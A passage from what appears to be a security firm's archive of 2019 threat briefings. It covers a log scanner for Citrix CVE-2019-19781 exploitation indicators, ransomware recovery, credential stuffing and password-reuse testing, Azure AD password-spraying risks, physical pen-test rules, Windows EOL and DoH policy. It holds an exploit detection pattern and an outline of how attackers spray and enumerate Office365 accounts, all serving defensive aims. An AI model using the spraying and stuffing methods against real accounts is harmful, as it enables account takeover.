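198.51.100.2 - - [31/Dec/2019:10:00:04 +0000] "GET /vpns/portal/example.pl HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_path(path):
    """Percent-decode (twice, to catch double encoding) and lower-case the request
    path so encoded or mixed-case variants of the indicator are not missed."""
    return unquote(unquote(path)).lower()


def is_vpns_indicator(entry, methods=("POST",)):
    """The briefing's indicator: a request using one of `methods` whose path contains /vpns/."""
    return entry["method"] in methods and "/vpns/" in normalize_path(entry["path"])


def scan(lines, methods=("POST",)):
    """Return the parsed entries that match the indicator, in log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_vpns_indicator(entry, methods):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["client"]} {hit["method"]} {hit["path"]} -> {hit["status"]}')
```

Run it against the access logs from the reverse proxy or load balancer in front of the NetScaler, not only the device itself, since the device's own logs may be tampered with after a compromise; widen `methods` to include GET if you want every touch of that path surfaced for review.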

Additional Resources

Mitre: CVE-2019-19781

Citrix: Mitigation Steps for CVE-2019-19781

Citrix: CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Internet Storm Center: Some Thoughts About the Critical Citrix ADC/Gateway Vulnerability (CVE-2019-19781)

12/24/19 Ransomware: Recovery is Critical

Ransomware: Recovery is Critical

Recent weeks have brought several reports of state, local and regional governments that have been “held hostage” by ransomware infections.  Though disheartening, the reports also show some progress in maintaining operations during ransomware attacks:

•    The City of New Orleans: While only a few departments were affected, some were advised to shut down and disconnect from the network for extended periods of time while the attack was mitigated.  The attack was deemed serious enough for the city to activate its Emergency Operations Center.  No ransom was paid.

•    Hackensack Meridian Health:  IT operations were suspended “across the board” for nearly 5 days, ultimately affecting patient care through the cancellation of approximately 100 elective surgical procedures. Recovery was achieved by paying the ransomware operators to release the systems, with the fees ultimately covered by the health care entity’s cyber insurance.

•    The Town of East Greenwich, RI: IT administrators noticed problems early on and shut down the affected systems, preventing any additional compromises.  For those systems that were affected, good previously-tested backups existed.  Data was restored and operations resumed within two business days.  No ransom was paid.

A recent report from the Emsisoft Malware Lab counted ransomware incidents for 2019 at 759 healthcare providers and 103 state and municipal governments and agencies. While these reports have been from government and healthcare entities, it is likely that large numbers of enterprises have been affected, but many are not required by law to report.

In the cases identified here, most had an outage in operations for an extended period of time. This outage resulted in financial losses, disruption in services and potential life safety issues.  Many organizations still need to adopt the mentality of “it is not if we get compromised, but when”. With this mindset, attack and compromise is an eventuality, but the response to that attack is key to a quick recovery.

In the case of the Town of East Greenwich, the town clearly had a very robust recovery plan and well-established processes and procedures for an outage or attack, which preserved business continuity.  While their preventive controls may have been limited, detection was timely and the recovery was exemplary.

In this case, InGuardians recommends developing, exercising, and testing a response and recovery plan. Specifically in the case of ransomware, being able to restore systems and data to a known good state is key to recovery without the need to pay ransoms.  Some ways in which this can be accomplished are:

•    Backups: refine a backup plan to cover all of your essential data, even if it is decentralized; this broadens the plan’s scope and cost, but that coverage is what makes recovery possible.  These backups should be kept in three forms: one set online and readily available in the local environment, another online and readily available on a remote secured network, and a third offline and disconnected, with an established SLA for retrieval.  The offline copy matters because ransomware that reaches the environment will also encrypt or delete any backups it can reach over the network.

•    Easily-rebuilt devices: With standardized endpoint and server builds across the organization, a “gold image” can be created, kept updated, and deployed quickly, aiding faster recovery.

•    Root cause analysis: After the restoration of services, the analysis should be performed to determine the initial attack vector, and revisions to security controls should be implemented in order to prevent similar or additional attacks.

Additional Resources
Hackensack Meridian Health network confirms ransomware attack last week

New Bedford city computers targeted in ransomware attack

New Orleans city government under cyberattack; workers told to turn off, unplug computers

Hackers hit Pensacola with ransomware attack one day after air station shooting

Rhode Island Town Successfully Fights Ransomware Attack


12/17/19 The Rise of IoT: The gift that keeps on giving

The Rise of IoT: The gift that keeps on giving

In the last few years we, as an industry, have seen a massive uptick in the adoption of internet-connected devices.  These devices are often collectively referred to as the Internet of Things (IoT), and are quite popular in the home consumer market.  However, there is an increasing trend toward adoption of enterprise-grade IoT gear, or the use of consumer-grade gear, in the enterprise.  Overall, the adoption of these technologies is seen as a benefit for productivity, physical security, or convenience.
While the perceived benefits are in most cases true, from an IT security perspective we should consider these devices carefully.  In this new market, we find that IoT devices often suffer from one or more of the following issues:
Lack of processing power on the IoT device itself hinders the application of robust IT security controls.
The need to support a consumer base with a variety of skill levels with limited customer support options often results in the adoption of a “lowest common denominator” of lackluster security implementations (default passwords, HTTP, etc).
A rush to market for a new product or service often limits IT security implementation.
Patching and automatic updates have few management options that are suitable for enterprise deployment.
Cloud based services managed by the IoT provider often fall outside of enterprise security practices.

Increased attacker focus on IoT has produced attacks against many of the identified shortcomings in overall IoT security postures.   The outcome of a compromise varies with the IoT implementation, but the following outcomes should be considered:

Compromise of enterprise IoT, resulting in complete compromise of the organization.
Public notification of a breach through IoT devices, resulting in loss of faith in the organization.
Compromise of staff IoT environment, creating a pivot point to remote enterprise resources.

As we move into the new year, our recommendations are threefold:

  1. Consider the creation and implementation of policy in your organization to address the increased use of IoT.  This policy should balance the overall benefit versus the overall risk should the device and associated cloud services become compromised.
  2. Perform discovery and testing internally to the organization in order to detect previously deployed IoT devices, and plan to address any IT security risks with the IoT implementations.
  3. Educate staff at large about the risks of IoT technology in their homes and how it can affect the enterprise.  Offer them advice on selecting platforms, how to respond to identified threats, and how to apply the Principle of Least Privilege should they choose to adopt IoT devices.

Additional Resources
Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis (Wired)

Your Smart Christmas Lights Are Safer Than They Were Last Year (Threatpost)

Consumers not willing to compromise when it comes to IoT security (Help Net Security)

12/9/19 Credential Stuffing: The Finger Points Both Ways

Credential Stuffing: The Finger Points Both Ways

On November 12th The Walt Disney Company opened up their Disney+ streaming service to the public for use.  While the release had some performance-related issues at the initial launch, the streaming service’s launch also kicked off a tremendous amount of account theft.  Within a few days of launch, it was reported that over 100,000 accounts were available for sale on the “dark web”.  Users reported that bad actors had compromised their newly-created accounts, changed their passwords, and taken the users’ control away; in some cases, the compromised accounts were pre-paid for one to three years.

Reports from various media outlets indicate that the accounts became compromised via three methods: prior user device compromise via keystroke loggers, prior user device compromise with credential-stealing malware, and credential stuffing.  While the first two methods were a result of a prior compromise of a user device, the credential stuffing attacks were direct attacks against the service itself.

In a credential stuffing attack, the bad actor acquires previously disclosed credentials from other compromised sites/services and tries these same username-password pairs against a target like Disney+.  Unfortunately, this technique generally proves quite effective, as many people use the same password across multiple sites and services.  When a bad actor compromises a site, they will sometimes publish all credentials found.  According to a report released earlier this year, the first six months of 2019 had nearly 4,000 breaches, resulting in over 4.1 billion sets of credentials published to the internet.

In the case of credential stuffing attacks, successful application of stolen credentials can result in a full compromise of the affected account.  Depending on the nature of the service being compromised, it can result in a financial loss for the user, disruption of service for the user, and ultimately financial losses and loss of faith for the service provider.  The Disney+ case appears to have contained all three of these effects.

While credential stuffing is typically seen as an account compromise for “other” services in use by staff in your organization, many fail to identify that their own services may be subject to the same attacks.  Every organization can fall prey to this kind of attack. There’s even greater risk when the username is an e-mail address or where the user can define their own username. In these cases, both password and username re-use rates increase dramatically.

InGuardians recommends that organizations should attempt credential stuffing attacks, using the same publicly-available compromised credential lists that bad actors use, in order to reveal password reuse in the organization.

These tests can reveal which users have reused passwords within your application, allowing for password changes and user education.  Additional password strength review may also be in order, in conjunction with a revised password policy.  Overall the best solution would be to enable and require multi-factor authentication for the affected application.
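An offline way to run the password-reuse test recommended above without hammering the production login form (and tripping its lockouts), as an added example that is not part of the briefing: take a leaked username:password list and re-hash each candidate password with the matching user’s stored salt, so reuse is found without ever submitting the password to the application. The user store, its PBKDF2 hashing and the leaked list are constructed for the demo; substitute your application’s real hash function and parameters.

```python
"""Offline password-reuse check against a leaked-credential list.

Added example; it is not part of the briefing. The user store, the PBKDF2
hashing and the leaked list are constructed for the demo.
"""
import hashlib
import hmac
import os

ITERATIONS = 100_000  # demo value; use your application's real parameters


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def make_user(email, password):
    """Stand-in for a row in the application's user table."""
    salt = os.urandom(16)
    return {"email": email, "salt": salt, "hash": hash_password(password, salt)}


USER_STORE = [
    make_user("alice@example.com", "Winter2019!"),
    make_user("bob@example.com", "correct horse battery staple"),
    make_user("carol@example.com", "S3cure-and-unique"),
]

# Constructed "breach dump" in the username:password layout common to public lists.
LEAKED = """\
alice@example.com:Winter2019!
bob@example.com:hunter2
bob@example.com:correct horse battery staple
dave@example.com:password123
ALICE@EXAMPLE.COM:Winter2018!
"""


def parse_leak(text):
    """Yield (email, password) pairs; emails are case-folded so ALICE@ matches alice@.
    Only the first colon splits, since passwords may themselves contain colons."""
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, password = line.split(":", 1)
        yield user.strip().lower(), password


def find_reuse(store, leaked_text):
    """Map each affected email to the leaked passwords that match its current hash.
    Only users present in both the store and the leak are tried, so the cost is
    one hash per leaked pair for a known user, not a full-list spray."""
    by_email = {u["email"].lower(): u for u in store}
    hits = {}
    for email, password in parse_leak(leaked_text):
        user = by_email.get(email)
        if user is None:
            continue
        candidate = hash_password(password, user["salt"])
        if hmac.compare_digest(candidate, user["hash"]):
            hits.setdefault(email, []).append(password)
    return hits


if __name__ == "__main__":
    for email, matches in find_reuse(USER_STORE, LEAKED).items():
        # In practice: record only the account, force a reset, never keep the plaintext.
        print(f"{email}: {len(matches)} leaked password(s) still valid")
```

Treat the output as sensitive: record which accounts matched, force a reset and notify the user, and discard the matching plaintexts rather than storing them. Users whose usernames are e-mail addresses are the ones this catches most often, which is exactly the reuse risk the briefing describes.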

In addition to testing whether credential stuffing succeeds against your systems and applications, InGuardians recommends deploying monitoring that detects credential stuffing in progress, for example by alerting when a single source attempts many distinct usernames in a short window.

Additional Resources
Thousands of hacked Disney+ accounts are already for sale on hacking forums

Data Breaches Expose 4.1 Billion Records In First Six Months Of 2019 (Forbes) 

11/12/19 Is Office365 Exposing Your Active Directory?

Is Office365 Exposing Your Active Directory?
Over the course of numerous assessments with a variety of organizations, InGuardians found that Microsoft’s Office365 suite of products might have improper permissions or settings on the supporting infrastructure. In order for an organization to use all of Office365’s bells and whistles while using internal domain credentials for Outlook online and any other connected application, a supporting infrastructure of Azure Active Directory must be created.

Two methods may be used to support this login feature: synchronizing the internal, on-premises Active Directory environment to Azure Active Directory, or using Active Directory Federation Services (ADFS) to forward authentication requests to the internal Active Directory environment. Both login paths are exposed to the internet, behind authentication to an Azure Active Directory tenant.

InGuardians has exploited this configuration many times. The attack is made easier by the fact that these services allow attackers to:

1.    Engage in password-based attacks against Active Directory without directly touching the enterprise network.
2.    With valid credentials, enumerate Active Directory domains, users, groups, and group memberships.
3.    Continue spraying, guessing, or reusing passwords for a targeted list of users in specific groups such as Domain Admins, Azure Admins, Office365 Admins, and/or VPN/Remote Access.

With this information, if Multi-Factor Authentication (MFA) is not enabled on services that provide access to internal resources such as VPN or Citrix, a malicious actor can make the jump from outside of the network to resources on the internal network, and possibly even code execution, all with little to no effort other than gathering a list of users and finding a weak password.

InGuardians has used this method to gain internal network access on assessments, and if the default configuration settings are left in place the attack is trivial. An attacker can use these services to spray passwords against publicly known email accounts looking for a weak one, and, once found, pull a full list of users, groups and group members. The attacker can then use that list to spray for more weak passwords, and potentially gain internal network access.

InGuardians recommends that your organization:
•    Disable PowerShell and portal access to Azure Active Directory for users who do not need it.
•    Align the Azure Active Directory and Office365 lockout thresholds and durations with the internal network’s password policy.
•    Require MFA on Office365 and all externally facing resources.
•    Monitor and alert on failed login attempts to Azure Active Directory; this may require specific licensing.
•    Review which Organizational Units can be viewed by, or are synced with, Azure Active Directory.
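The following is an added example, not part of the original text, that serves two recommendations on this page: the monitoring for credential stuffing in the 12/9/19 briefing and the alerting on failed Azure Active Directory logins above. It groups sign-in events by source address and time window and reports any source that touches many distinct accounts. The two attacks look alike in failed-login counts, so it separates them by a feature visible in most IdP logs: a burst dominated by usernames that do not exist points to credential stuffing with someone else’s breach list, while a burst against only valid accounts looks like a password spray run against an enumerated directory. The event format (one JSON object per line with the fields ts, src, user and result, where result distinguishes an unknown account from a wrong password) and the events themselves are constructed; map the field names to whatever your IdP or application exports.

```python
"""Pick credential-stuffing and password-spraying bursts out of sign-in events.

Added example; it is not part of the briefing. The event layout and field
names are assumptions and the events below are constructed.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed events. 203.0.113.7 tries six accounts, four of which do not exist, and
# gets one success; 198.51.100.23 tries one password each against six valid accounts;
# 192.0.2.10 is a user who mistypes twice and then logs in.
EVENTS = """\
{"ts":"2019-11-12T09:00:01+00:00","src":"203.0.113.7","user":"alice@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:00:02+00:00","src":"203.0.113.7","user":"jsmith99@example.com","result":"unknown_user"}
{"ts":"2019-11-12T09:00:03+00:00","src":"203.0.113.7","user":"gamer_dan@example.com","result":"unknown_user"}
{"ts":"2019-11-12T09:00:04+00:00","src":"203.0.113.7","user":"mlee@example.com","result":"unknown_user"}
{"ts":"2019-11-12T09:00:05+00:00","src":"203.0.113.7","user":"Erin@example.com","result":"success"}
{"ts":"2019-11-12T09:00:06+00:00","src":"203.0.113.7","user":"pat.k@example.com","result":"unknown_user"}
{"ts":"2019-11-12T09:01:00+00:00","src":"198.51.100.23","user":"alice@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:01:30+00:00","src":"198.51.100.23","user":"bob@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:02:00+00:00","src":"198.51.100.23","user":"carol@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:02:30+00:00","src":"198.51.100.23","user":"dave@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:03:00+00:00","src":"198.51.100.23","user":"erin@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:03:30+00:00","src":"198.51.100.23","user":"frank@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:05:00+00:00","src":"192.0.2.10","user":"alice@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:05:10+00:00","src":"192.0.2.10","user":"alice@example.com","result":"bad_password"}
{"ts":"2019-11-12T09:05:20+00:00","src":"192.0.2.10","user":"alice@example.com","result":"success"}
"""


def parse_events(text):
    """Parse one JSON event per line; timestamps carry an explicit UTC offset."""
    events = []
    for line in text.strip().splitlines():
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"])
        event["user"] = event["user"].lower()
        events.append(event)
    return events


def detect(events, window=timedelta(minutes=10), min_users=5, unknown_ratio=0.5):
    """Bucket events by (source, time window); report sources that touch at least
    min_users distinct accounts in one window, labelled by the share of attempts
    that hit accounts which do not exist. Any success inside a flagged burst is
    an account to lock and reset immediately."""
    buckets = defaultdict(list)
    for event in events:
        slot = int(event["ts"].timestamp() // window.total_seconds())
        buckets[(event["src"], slot)].append(event)

    findings = []
    for (src, _slot), burst in sorted(buckets.items()):
        users = {e["user"] for e in burst}
        if len(users) < min_users:
            continue
        results = Counter(e["result"] for e in burst)
        stuffing = results["unknown_user"] / len(burst) >= unknown_ratio
        findings.append({
            "src": src,
            "kind": "credential_stuffing" if stuffing else "password_spray",
            "users": len(users),
            "attempts": len(burst),
            "compromised": sorted(e["user"] for e in burst if e["result"] == "success"),
        })
    return findings


if __name__ == "__main__":
    for finding in detect(parse_events(EVENTS)):
        print(finding)
```

Two caveats a practitioner should expect: attackers rotate source addresses, so run the same grouping keyed on user-agent or on a /24 as well as on the exact address; and sprays are often slow enough to stay under one attempt per account per lockout window, so set `window` to hours for that case and lower `min_users` accordingly.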

Additional Resources
Block user access to Azure AD PowerShell and Graph API Explorer – O365blog

Step-by-Step Guide to Restrict Azure AD Administration portal – RebelAdmin

What are the default user permissions in Azure Active Directory? – Microsoft

Securing Microsoft Active Directory Federation Server (ADFS) – ADsecurity

Azure Active Directory User (Organization Unit) Sync Filtering – Microsoft

11/7/19 Executive Considerations for Physical Security Testing

Executive Considerations for Physical Security Testing

A series of misunderstandings led to the arrest of two Coalfire consultants during a physical penetration test commissioned by their client, the Iowa State Judicial Branch. Several officers had already cleared the consultants, who possessed documented permission and explanation of their actions. It was the elected County Sheriff who demanded the arrests.

Physical security is an essential element of Information Security. Every Information Security consultancy performs this work with a commitment to the security and safety of their employees, as well as their clients’ property and personnel.


Physical penetration test: Testing physical security through physical, digital, and social engineering methods.
Physical security assessment: Walkthrough evaluation of physical security controls and audit measures.
Provider: Information security consulting firm
Client: Organization commissioning the test

In the entire space of penetration testing services, physical penetration tests carry the most direct risk. There is a greater opportunity for physical harm to a provider’s operators and physical damage to client facilities than in strictly data-based security checks.  As such, it is important to take a highly rigorous and regimented approach to ensure that the risk is mitigated as best as possible, prior to commencing the active operations stage.

Attention to detail, a clear understanding of the many organizations beyond IT that may be involved, and comprehensive documentation are essential for success. The service provider and client should use threat modeling to determine the type of test or assessment that is most appropriate. Once a client and provider have determined that the client wants to move forward with a physical penetration test, the client organization must affirm that it exercises authority over the buildings in scope and demonstrate this comprehensively to the provider. Clear Rules of Engagement (RoE) and a narrative describing the assessment must be agreed upon by the client and provider, and then followed.

InGuardians recommends that providers take extra effort to understand the client’s motivations and needs when a client requests a physical penetration test or a full-scope red team penetration test. In many cases, finding a probable threat from the physical vector that outweighs the threat from more conventional sources can be a challenge. Undertaking a physical penetration test for the “cool factor” should raise concerns on the part of the provider.

A vital stage of every single assessment, regardless of the vector, is assuring that the person or team requesting the assessment has the authority to do so and that they have the legal and organizational authority to request the test against the desired scope.  This often requires an assessment of impacted parties and consideration of including them in the process, prior to the start of the assessment.

Another vital step here is to confirm that the client organization actually exercises authority over facilities in scope and does not sublet/lease its space. The provider must understand which areas of the buildings are leased or owned by the client, what rights this gives to common areas, and what areas of the building are leased, sublet, or managed by third parties. The provider should require the client to engage the landlord or management company, for facilities it does not own.

The other major miscommunication, in this case, revolved around the definitions laid out in the mutually agreed upon Rules of Engagement (RoE).  This misunderstanding isn’t unique to this type of agreement but exists whenever deeply technical or specialized terminology is used.  It is the experts’ role, in this case, Coalfire, to explain in clear detail what is meant by each term in the RoE.  InGuardians also recommends a pre-assessment meeting that confirms the RoE, in addition to clearly defining the terms in it, as an integral part of any physical assessment.

InGuardians believes that by following the steps below, organizations can reduce the risk of similar episodes such as those that occurred in Dallas County (Iowa) Courts.

– Clear engagement with a client in order to determine the type of test or assessment that best matches the risk faced by the organization
– Include all impacted, relevant parties in the discussion, including the security company and local law enforcement agencies
– Clearly define the  rules of engagement and defined terms

InGuardians supports calls for all charges in this case against Coalfire’s employees to be dropped, and for their records to be expunged of this incident. This situation is unfortunate, and it directly affects the consultants’ ability to hold a clearance or pass background checks.  These charges and arrests directly impact the consultants’ ability to pay their bills and feed their families.

Additional Resources
Iowa County Home Rule Implementation, Office of County Sheriff.  N.B. The office of sheriff is an elective office. 

“Men arrested for breaking into Dallas County Courthouse after judicial branch hires them to test ‘vulnerability’ of court records” (Des Moines Register)

“Documents: Courthouse break-in attempts part of the agreement, but not at night” (KCCI)

“Iowa officials claim confusion over scope led to arrest of pen-testers” (ArsTechnica)

Coalfire CEO Tom McAndrew’s Statement (Coalfire Blog)

A message of support from TrustedSec

10/29/19 End of Life Less Than Three Months Away for Windows 7 and Windows Server 2008

End of Life Less Than Three Months Away for Windows 7 and Windows Server 2008
Microsoft will end free support for Windows 7 and Windows Server 2008 (both the original release and R2) on January 14, 2020. This means there will be no further patches or support for these operating systems, unless users purchase extended security update services. Despite this, many organizations have not begun the planning and work to migrate off of these platforms.  It is estimated that roughly 70% of all enterprise applications are running on Server 2008.

The impact will range from organizations having to pay for Extended Security Updates (ESU) to letting support lapse and be left vulnerable.  The cost per year for ESU for Server 2008 is 75% of the site license cost, up to a maximum of 225% of the license cost if an organization purchases three years of support.  The price of ESU per Windows 7 device will scale from $25 to $100 each year until they expire in January of 2023.  In addition to the cost, keep in mind that Microsoft will not be providing technical support beyond the January 14, 2020 deadline.

Malicious attackers and penetration testers alike find endpoints with operating systems that have passed their End of Life (EOL) to be incredibly easy targets. These systems provide a penetration tester with a convenient foothold on a network and in a domain.

InGuardians recommends conducting an accurate inventory to identify systems running soon-to-be end-of-life (EOL) operating systems. This inventory must include endpoints that are not domain-joined, which a directory export alone will miss. Following the inventory, it is imperative to plan for upgrading or replacing the EOL systems.
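One way to build the inventory report recommended above, as an added example that is not part of the briefing: it keys on the Windows NT kernel version (6.0 = Vista / Server 2008, 6.1 = Windows 7 / Server 2008 R2) rather than on product names, because a version is what an unauthenticated network scan can observe for machines that never appear in Active Directory, and it computes the days left before the January 14, 2020 deadline. The inventory rows, their column names and the banner format are constructed; in practice the rows come from merging a directory export with a network scan of the address space.

```python
"""Find Windows hosts that lose support on 14 January 2020, including hosts
that are not domain-joined.

Added example; it is not part of the briefing. Inventory rows, column names
and the banner format are constructed.
"""
import csv
import io
import re
from datetime import date

EOL_DATE = date(2020, 1, 14)

# NT kernel version -> products retiring on EOL_DATE
EOL_NT_VERSIONS = {
    "6.0": "Windows Vista / Windows Server 2008",
    "6.1": "Windows 7 / Windows Server 2008 R2",
}
NT_VERSION_RE = re.compile(r"\bNT (\d+\.\d+)\b")

# Constructed inventory merged from a directory export and a network scan, so that
# the non-domain-joined kiosk and HMI appear alongside the servers.
INVENTORY = """\
host,ip,os_banner,domain_joined
fs01,10.0.0.5,Windows Server 2008 R2 Standard (NT 6.1) build 7601,yes
kiosk-3,10.0.5.40,Windows 7 Professional (NT 6.1) build 7601,no
app02,10.0.0.9,Windows Server 2016 Standard (NT 10.0) build 14393,yes
hmi-1,10.0.9.2,Windows Embedded Standard (NT 6.1) build 7601,no
web01,10.0.0.12,Windows Server 2008 Standard (NT 6.0) build 6002,yes
printer-7,10.0.5.70,,no
"""


def classify(inventory_text, today):
    """Return one record per host with its NT version, whether it hits the
    2020-01-14 EOL, and the days remaining (negative once the date has passed)."""
    report = []
    for row in csv.DictReader(io.StringIO(inventory_text)):
        m = NT_VERSION_RE.search(row["os_banner"])
        nt = m.group(1) if m else None
        eol = nt in EOL_NT_VERSIONS
        report.append({
            "host": row["host"],
            "nt": nt,
            "eol": eol,
            "products": EOL_NT_VERSIONS.get(nt),
            "days_left": (EOL_DATE - today).days if eol else None,
            "domain_joined": row["domain_joined"] == "yes",
            # Embedded/POSReady variants share the 6.1 kernel but follow their own
            # lifecycle; flag them for a manual lifecycle lookup instead of assuming.
            "review": eol and "Embedded" in row["os_banner"],
        })
    return report


def eol_hosts(report):
    return [r["host"] for r in report if r["eol"]]


def unmanaged_eol_hosts(report):
    """EOL hosts that are not domain-joined: the ones patch tooling and GPO never see."""
    return [r["host"] for r in report if r["eol"] and not r["domain_joined"]]


if __name__ == "__main__":
    for r in classify(INVENTORY, date.today()):
        if r["eol"]:
            print(f'{r["host"]:10} NT {r["nt"]}  {r["products"]}  days left: {r["days_left"]}'
                  f'{"  (not domain-joined)" if not r["domain_joined"] else ""}'
                  f'{"  REVIEW LIFECYCLE" if r["review"] else ""}')
```

Hosts with an empty banner (the printer above) are not cleared; they simply could not be fingerprinted and need another method. The non-domain-joined list is the one to hand to the isolation work described below, since those machines are also the ones least likely to receive ESU or a firewall policy through central tooling.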

Windows Server 2008-Specific Recommendations
Upgrade to the newest version of Windows Server that can host the enterprise applications. Most software that can run on Server 2008 can run on Server 2016 and Server 2019. In addition, upgrading domain controllers to newer versions can provide new features that aid in administration and improve security.

Windows 7-Specific Recommendations
Upgrade to Windows 10. This provides substantial new administration and security features.

If systems cannot be upgraded or replaced for software or hardware compatibility reasons, isolate the systems as much as possible using firewalls to prevent any but explicitly necessary communication with other computers, including restricting internet access. Work with vendors to identify an upgrade path for legacy software so that EOL systems can be phased out.

Additional Resources
Lifecycle FAQ-Extended Security Updates (Microsoft Support)

“Prepare for Windows Server 2008 end of support” (Microsoft)

“Microsoft support lifecycle – Search product lifecycle” (Microsoft)

10/22/19 Third-party VPN provider confirms it was compromised

Third-party VPN provider confirms it was compromised

NordVPN, a third-party provider of global VPN Services has confirmed that it suffered a compromise of one of its VPN servers in Finland during March 2018. According to NordVPN, someone physically accessed the data center where their servers were located and then exploited an insecure remote management system put in place by the operators of the data center.

The NordVPN breach exposes a number of issues.  As far as we can interpret, there was a physical security breach, followed by compromise of the data center’s remote management software, followed by unauthorized access to the VPN server in question.

Anytime a third party VPN is used, the security of the connection is never a known quantity. Although assurances are made by third-party providers, the only way to know that a connection is secure is by using your own VPN that is managed by your own organization.  In this case, confidential information could have been compromised.

Until more information is released by NordVPN, any confidential information that traversed their service from at least March 2018 onward should be considered compromised.

InGuardians recommends that your organization manage its own VPN service rather than relying on a third party. Likewise, ensure that the VPN product is a secure and patched platform, as some products, such as Pulse Secure VPN, have had serious issues as recently as October 2019.

Furthermore, require strong authentication and physical security at all of the data centers where you host your servers.
Ensure that all exposed services are patched especially ones that allow for remote management and administration.
Last but not least, routinely audit physical and digital access to critical systems looking for any instances of unplanned change.

Additional Resources
Initial article from TechCrunch:

Recent issues with PulseVPN:

10/15/19 DNS over HTTPS: Friend or Foe?

DNS over HTTPS: Friend or Foe?

In recent weeks there has been heated discussion of DNS over HTTPS (DoH), specified in IETF RFC 8484 and developed more than two years ago. While the idea of carrying DNS queries over an encrypted transport is not new, it has not yet been widely deployed. DoH has nevertheless become quite relevant, as both Google Chrome and Mozilla Firefox intend to enable it by the end of 2019.

With DoH, the intent is to move an unencrypted and unauthenticated protocol onto a new transport, one that uses TLS encryption and the trust model of the public Certificate Authority system.

In most cases, a move to a more secure transport would be seen as a clear improvement. DoH prevents an attacker on the network path from reading or modifying DNS queries in transit.  It does not, however, protect lookups from malware already running on the endpoint, which can still manipulate them before or after the browser resolves a name.

However, enabling DoH by default in Chrome and Firefox seriously hampers enterprise system administrators’ ability to observe DNS requests, because the queries bypass the enterprise resolver and travel encrypted to the browser’s chosen provider.  This loss of visibility effectively eliminates some quite effective security controls, including DNS blacklisting.  Incident response also becomes harder: responders lose real-time observation of DNS traffic as well as the DNS evidence that is often vital in determining root cause.

InGuardians recommends that organizations relying on Chrome and Firefox consider disabling DoH within the browser and reverting to standard plaintext DNS (examples are listed in the Additional Resources section), in order to maintain visibility and the security controls already in place. For these organizations, the drawbacks of DoH outweigh its perceived benefits in the short term.

Ideally organizations should not allow end users to install browsers such as Chrome or Firefox but deploy them utilizing the available enterprise management resources, in order to allow system administrators to appropriately configure the browser enterprise wide.
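The two policy documents that implement the recommendation above, generated and checked from Python as an added example that is not part of the briefing. The policy names are the documented enterprise policies for Firefox (`DNSOverHTTPS` in `policies.json`) and Chrome (`DnsOverHttpsMode`); the deployment paths in the comments are the usual locations and are assumptions about your environment. The weak setting (DoH enabled, or Chrome’s default “automatic” upgrade) is shown beside the corrected one, and `doh_disabled` rejects a Firefox policy that turns DoH off but leaves the user free to turn it back on.

```python
"""Browser policies that keep DNS on the plaintext enterprise resolver.

Added example, not part of the briefing. Policy names are the documented
Firefox and Chrome enterprise policies; file paths are assumptions.
"""
import json


def firefox_policy(allow_doh=False):
    """policies.json for Firefox (read from <install dir>/distribution/policies.json,
    or the equivalent GPO/plist). Locked stops the user re-enabling DoH in
    about:preferences."""
    return {"policies": {"DNSOverHTTPS": {"Enabled": allow_doh, "Locked": True}}}


def chrome_policy(allow_doh=False):
    """Managed policy for Chrome/Chromium (Linux: /etc/opt/chrome/policies/managed/*.json;
    Windows/macOS via GPO or plist). "automatic" is the default and upgrades to DoH
    whenever the system resolver is a known DoH provider; "off" forces classic DNS."""
    return {"DnsOverHttpsMode": "automatic" if allow_doh else "off"}


def doh_disabled(policy):
    """True when the document pins the browser to plaintext DNS in a way the user
    cannot override. Works for either browser's document shape."""
    if "policies" in policy:  # Firefox
        doh = policy["policies"].get("DNSOverHTTPS", {})
        return doh.get("Enabled") is False and doh.get("Locked") is True
    return policy.get("DnsOverHttpsMode") == "off"


def render(policy):
    """Serialize a policy document as it should be written to disk."""
    return json.dumps(policy, indent=2, sort_keys=True)


if __name__ == "__main__":
    print(render(firefox_policy()))
    print(render(chrome_policy()))
```

After deployment, confirm the setting took effect from a managed workstation: Chrome shows the applied value under chrome://policy and Firefox under about:policies. If the policy does not appear there, the browser is not actually managed and a user-installed copy will still upgrade to DoH.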

Alternatively, additional protections can be put in place in order to protect the integrity and confidentiality of DNS exchanges.  These protections include the implementation of DNSSEC for integrity, and the use of client based VPNs (with split tunnel disabled) where confidentiality is required, such as on a public WiFi network.

Organizations should continue to evaluate the adoption of DoH, particularly if the protocol implements ways to augment current, effective security methodologies.

Additional Resources
DNS Queries over HTTPS (DoH)

“What’s next in making Encrypted DNS-over-HTTPS the Default”

“The Chromium Projects: DNS over HTTPS (aka DoH)” (Chromium for Developers)

“DNS-over-HTTPS causes more problems than it solves, experts say”

Turning off DoH:

“The Chromium Projects: DNS over HTTPS (aka DoH)” (Chromium for Developers)

“How to Turn off Trusted Recursive Resolver in Mozilla Firefox”

Chrome Enterprise Management

Firefox Enterprise Management

10/9/19 URGENT/11: Highest-severity, publicly-exploitable vulnerabilities found in more than 30 vendors’ embedded and RTOS devices

URGENT/11: Highest-severity, publicly-exploitable vulnerabilities found in more than 30 vendors’ embedded and RTOS devices

Last Tuesday, the Food and Drug Administration issued an official safety communication, warning the public that the URGENT/11 vulnerabilities, originally thought to be confined to the VxWorks real-time embedded operating system (RTOS), were present in four additional embedded operating systems.  The URGENT/11 vulnerabilities present a danger to health care devices, industrial control systems, SCADA systems, phones, printers and firewalls, at least.   The vulnerable embedded operating systems include, as of this writing:

•    ENEA’s Operating System Embedded (OSE)
•    Green Hills’ INTEGRITY
